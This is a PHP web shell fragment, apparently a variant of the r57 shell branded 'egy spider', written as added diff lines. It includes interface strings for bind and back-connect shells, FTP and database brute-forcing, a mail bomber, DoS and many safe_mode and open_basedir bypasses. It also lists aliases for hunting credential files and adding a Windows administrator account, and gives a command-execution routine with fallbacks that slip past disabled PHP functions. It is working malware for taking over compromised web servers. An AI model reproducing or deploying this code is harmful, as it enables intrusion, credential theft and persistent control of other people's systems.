+'eng_err0'=>'Error! Can\'t write in file ', +'eng_err1'=>'Error! Can\'t read file ', +'eng_err2'=>'Error! Can\'t create ', +'eng_err3'=>'Error! Can\'t connect to ftp', +'eng_err4'=>'Error! Can\'t login on ftp server', +'eng_err5'=>'Error! Can\'t change dir on ftp', +'eng_err6'=>'Error! Can\'t sent mail', +'eng_err7'=>'Mail send', +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database . Table', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Database', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_butt65'=>'Create', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_butt14'=>'Download', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'FTP-server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without archivation', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'* use username from /etc/passwd for ftp login and password', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu) login for password', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', +'eng_text104'=>'Send file to email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subj', +'eng_butt15'=>'Send', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +'eng_text111'=>'SQL-Server : Port', +'eng_text112'=>'Test bypass safe_mode with function mb_send_mail', +'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list', +'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body', +'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()', +'eng_text116'=>'Copy from', +'eng_text117'=>'to', +'eng_text118'=>'File copied', +'eng_text119'=>'Cant copy file', +'eng_err0'=>'Error! Can\'t write in file ', +'eng_err1'=>'Error! Can\'t read file ', +'eng_err2'=>'Error! Can\'t create ', +'eng_err3'=>'Error! Can\'t connect to ftp', +'eng_err4'=>'Error! Can\'t login on ftp server', +'eng_err5'=>'Error! Can\'t change dir on ftp', +'eng_err6'=>'Error! Can\'t sent mail', +'eng_err7'=>'Mail send', +'eng_text200'=>'read file from vul copy()', +'eng_text500'=>'read file from id()', +'eng_text555'=>'read file from imap()', +'eng_text202'=>'where file in server', +'eng_text300'=>'read file from vul curl()', +'eng_text203'=>'read file from vul ini_restore()', +'eng_text204'=>'write shell from vul error_log()', +'eng_text205'=>'write shell in this side', +'eng_text206'=>'read dir', +'eng_text207'=>'read dir from vul reg_glob', +'eng_text208'=>'execute with function', +'eng_text209'=>'read dir from vul root', +'eng_text210'=>'DeZender ', +'eng_text211'=>'::safe_mode off::', +'eng_text212'=>'colse safe_mode with php.ini', +'eng_text213'=>'colse security_mod with .htaccess', +'eng_text214'=>'Admin name', +'eng_text215'=>'IRC server ', +'eng_text216'=>'#room name', +'eng_text217'=>'server', +'eng_text218'=>'write ini.php file to close safe_mode with ini_restore vul', +'eng_text225'=>'MySQL Safe Mode Bypass 4.4.7 / 5.2.3 PHP ', +'eng_text226'=>'Safe Mode Bpass Root Directory: ', +'eng_text227'=>'Safe_Mode Bypass 4.4.2/5.1.2: ', +'eng_text228'=>'tools for hacker vb ', +'eng_text230'=>'know pass of cpanel ', +'eng_text219'=>'Get file to server in safe_mode and change name', +'eng_text220'=>'show file with symlink vul', +'eng_text221'=>'zip file in server to download', +'eng_text222'=>'2 symlink use vul', +'eng_text223'=>'read file from funcution', +'eng_text224'=>'read file from PLUGIN ', +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_butt3' =>'Bind', +'eng_butt4' =>'Connect', +'eng_butt5' =>'Run', +'eng_butt6' =>'Change', +'eng_butt7' =>'Show', +'eng_butt8' =>'Test', +'eng_butt9' =>'Dump', +'eng_butt10'=>'Save', +'eng_butt11'=>'Edit file', +'eng_butt12'=>'Find', +'eng_butt13'=>'Create/Delete', +'eng_butt14'=>'Download', +'eng_butt15'=>'Send', +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_text30'=>'Cat file', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database . Table', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Database', +'eng_text40'=>'Dump database table', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without arch.', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'/etc/passwd', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu)', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', +'eng_text104'=>'Send file to email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subj', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +'eng_text111'=>'SQL-Server : Port', +'eng_text112'=>'Test bypass safe_mode with function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)', +'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list() (PHP <= 5.1.2)', +'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body() (PHP <= 5.1.2)', +'eng_text115'=>'Test bypass safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)', +'eng_text116'=>'Copy from', +'eng_text117'=>'to', +'eng_text118'=>'File copied', +'eng_text119'=>'Cant copy file', +'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', +'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', +'eng_text122'=>'Test bypass open_basedir, view dir list via glob() (PHP <= 5.2.x)', +'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', +'eng_text124'=>'Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)', +'eng_text125'=>'Data', +'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', +'eng_text127'=>'Test bypass open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)', +'eng_text128'=>'Modify/Access file (touch)', +'eng_text129'=>'Test bypass open_basedir, create file via fopen(srpath://) (PHP v5.2.0)', +'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', +'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)', +'eng_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)', +'eng_text133'=>'Test bypass open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)', +'eng_text134'=>'Database-bruteforce', +'eng_text135'=>'Dictionary', +'eng_text136'=>'Creating evil symlink', +'eng_text137'=>'Useful', +'eng_text138'=>'Dangerous', +'eng_text139'=>'Mail Bomber', +'eng_text140'=>'DoS', +'eng_text141'=>'Danger! Web-daemon crash possible.', +'eng_text142'=>'Downloaders', +'eng_text143'=>'Temp: ', +'eng_text144'=>'Test bypass safe_mode with load file in mysqli', +'eng_text145'=>'Test bypass open_basedir, view dir list via realpath() (PHP <= 5.2.4)', +'eng_text146'=>'Max Interation', +'eng_text151'=>'Test bypass safe_mode with chdir()and ftok() (PHP <= 5.2.6)', +'eng_text161'=>'Test bypass safe_mode with posix_access() (posix ext) (PHP <= 5.2.6)', +'eng_text162'=>'ionCube extension safe_mode and disable_functions protections bypass (PHP <= 5.2.4)', +'eng_text163'=>'PHP Perl Extension Safe_mode Bypass Exploit', +'eng_text170'=>' Test bypass safe_mode and Open_basedir Settings by Posix_getpw (PHP <= 4.2.0)', +'eng_text171'=>' PHP (Win32std) Extension safe_mode/disable_functions Protections Bypass (PHP <= 5.2.3)', +'eng_text147'=>'', +'eng_text148'=>'', +'eng_text149'=>'', +'eng_text150'=>'', +'eng_text159'=>'About egy spider', +'eng_text152'=>'Latest News', +'eng_text153'=>'Logout ', +'eng_text154'=>'Quick index ', +'eng_text155'=>'Mass Code Injection ', +'eng_text156'=>'File source ', +'eng_text157'=>'Registration in Zone-h ', +'eng_text158'=>'Hash Tools ', +'eng_text160'=>'Home Shell ', +'eng_text180'=>'Send Your Comments And Contacted Me ', +'eng_err0'=>'Error! Can\'t write in file ', +'eng_err1'=>'Error! Can\'t read file ', +'eng_err2'=>'Error! Can\'t create ', +'eng_err3'=>'Error! Can\'t connect to ftp', +'eng_err4'=>'Error! Can\'t login on ftp server', +'eng_err5'=>'Error! Can\'t change dir on ftp', +'eng_err6'=>'Error! Can\'t sent mail', +'eng_err7'=>'Mail send', + +); +/* +?????? ?????? +????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) +?? ?????? ???? ????????? ??? ???????? ???????. +*/ +$aliases=array( +'----------------------------------locate'=>'', +'find httpd.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate httpd.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate vhosts.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate proftpd.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate psybnc.conf'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate my.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate admin.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate cfg.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate conf.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate config.dat files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate config.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate config.inc files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate config.inc.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate config.default.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate .conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate .pwd files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate .sql files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate .htpasswd files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate .bash_history files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate .mysql_history files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate backup files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate dump files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate priv files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate vhosts.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'________________find orders ______________-'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'cat /var/cpanel/accounting.log'=>'cat /var/cpanel/accounting.log', +'find all site of server and user'=>'ls -la /etc/valiases', +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'________________var orders var______________-'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'find /var/ error_log files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'find /var/ access.log files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'find /var/ error.log files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'find /var/ &quot;*.log&quot; files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'________________for server windows ______________-'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'1_learn the management server'=>'net user', +'2_add new user'=>'net user egy_spider 123456 /add', +'3_add your user for admin group (this order after add order 1&2'=>'net localgroup administrators egy_spider /add', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Webdings color=gray>4</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=Verdana size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if(isset($_GET['users'])) + { + if(!$users=get_users('/etc/passwd')) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; } + else + { + echo '<center>'; + foreach($users as $user) { echo $user."<br>"; } + echo '</center>'; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); + } + +if (!empty($_POST['dir'])) { if(@function_exists('chdir')){@chdir($_POST['dir']);} else if(@function_exists('chroot')){ @chroot($_POST['dir']);}; } +if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];} +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = @php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $unix = 0; } + else { $unix = 1; } + } + } + +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); + $r .= (!$unix)? str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; + $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; + die(); + } + +/*if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }*/ +if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }else{$safe_mode = 0;} +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } + +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} + +function ex($cfe) +{global $unix,$tempdir; + $res = ''; + if (!empty($cfe)) + { + if(@function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(@function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(@function_exists('system')) + { + @ob_start(); + @system('$cfe'); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@function_exists('popen') && @is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + if(@function_exists('fread') && @function_exists('feof')){ + while(!@feof($f)) { $res .= @fread($f,1024); } + }else if(@function_exists('fgets') && @function_exists('feof')){ + while(!@feof($f)) { $res .= @fgets($f,1024); } + } + @pclose($f); + } + elseif(@function_exists('proc_open') && @is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes))) + { + $res = ""; + if(@function_exists('fread') && @function_exists('feof')){ + while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);} + }else if(@function_exists('fgets') && @function_exists('feof')){ + while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);} + } + @proc_close($f); + } + }else{$res = safe_ex($cfe);} + return htmlspecialchars($res); +} + + +function safe_ex($cfe) +{global $unix,$tempdir; + $res = ''; + if (!empty($cfe)) + { + if(extension_loaded('perl')){ + @ob_start(); + $safeperl=new perl(); + $safeperl->eval("system('$cfe')"); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(!$unix && extension_loaded('ffi')) + { + $output=$tempdir.uniqid('NJ'); + $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); + if(!@function_exists('escapeshellarg')){$res=$api->WinExec("cmd.exe /c $cfe >\"$output\"",0);} + else{$res=$api->WinExec("cmd.exe /c ".@escapeshellarg($cfe)." >\"$output\"",0);} + while(!@file_exists($output))sleep(1); + $res=moreread($output); + @unlink($output); + } + elseif(!$unix && extension_loaded('win32service')) + { + $output=$tempdir.uniqid('NJ'); + $n_ser=uniqid('NJ'); + if(!@function_exists('escapeshellarg')) + {@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\\windows\\system32\\cmd.exe','params'=>"/c $cfe >\"$output\""));} + else{@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\\windows\\system32\\cmd.exe','params'=>"/c ".@escapeshellarg($cfe)." >\"$output\""));} + @win32_start_service($n_ser); + @win32_stop_service($n_ser); + @win32_delete_service($n_ser); + while(!@file_exists($output))sleep(1); + $res=moreread($output); + @unlink($output); + } + elseif(!$unix && extension_loaded("win32std")) + { + $output=$tempdir.uniqid('NJ'); + if(!@function_exists('escapeshellarg')){@win_shell_execute('..\..\..\..\..\..\..\windows\system32\cmd.exe /c '.$cfe.' > "'.$output.'"');} + else{@win_shell_execute('..\..\..\..\..\..\..\windows\system32\cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');} + while(!@file_exists($output))sleep(1); + $res=moreread($output); + @unlink($output); + } + elseif(!$unix) + { + $output=$tempdir.uniqid('NJ'); + $suntzu = new COM("WScript.Shell"); + if(!@function_exists('escapeshellarg')){$suntzu->Run('c:\windows\system32\cmd.exe /c '.$cfe.' > "'.$output.'"');} + else{$suntzu->Run('c:\windows\system32\cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');} + $res=moreread($output); + @unlink($output); + } + elseif(@function_exists('pcntl_exec') && @function_exists('pcntl_fork')) + { + $res = '[~] Blind Command Execution via [pcntl_exec]\n\n'; + $output=$tempdir.uniqid('pcntl'); + $pid = @pcntl_fork(); + if ($pid == -1) { + $res .= '[-] Could not children fork. Exit'; + } else if ($pid) { + if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';} + else {$res .= '[-] Error. Command incorrect.';} + } else { + $cfe = array(" -e 'system(\"$cfe > $output\")'"); + if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0); + if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0); + die(); + } + $res=moreread($output); + @unlink($output); + } +/* elseif(1) + { + + } +*/ + } + return htmlspecialchars($res); +} + +function get_users($filename) +{ + $users = $rows = array(); + $rows=@explode("\n",moreread($filename)); + if(!$rows[0]){$rows=@explode("\n",readzlib($filename));} + if(!$rows[0]) return 0; + foreach ($rows as $string) + { + $user = @explode(":",trim($string)); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function err($n,$txt='') +{ +echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>'; +echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; +if(!empty($txt)) { echo " $txt"; } +echo '</b></div></font></td></tr></table>'; +return null; +} +function perms($mode) +{ +if (!$GLOBALS['unix']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value,$checked=0) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." "; } + $ret .= "value=\"".$value."\""; + if($checked) $ret .= " checked"; + return $ret.">"; +} +function which($pr) +{ +$path = ''; +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return false; } +} +function ps($pr) +{global $unix; +$path = ''; +if($unix){$path = ex("ps -aux | grep $pr | grep -v 'grep'");} +else{$path = ex("tasklist | findstr \"$pr\"");} +if(!empty($path)) { return $path; } else { return false; } +} +function locate($pr) +{ +$path = ''; +$path = ex("locate $pr"); +if(!empty($path)) { return $path; } else { return false; } +} +function cf($fname,$text) +{ + if(!morewrite($fname,@base64_decode($text))){err(0);}; +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) 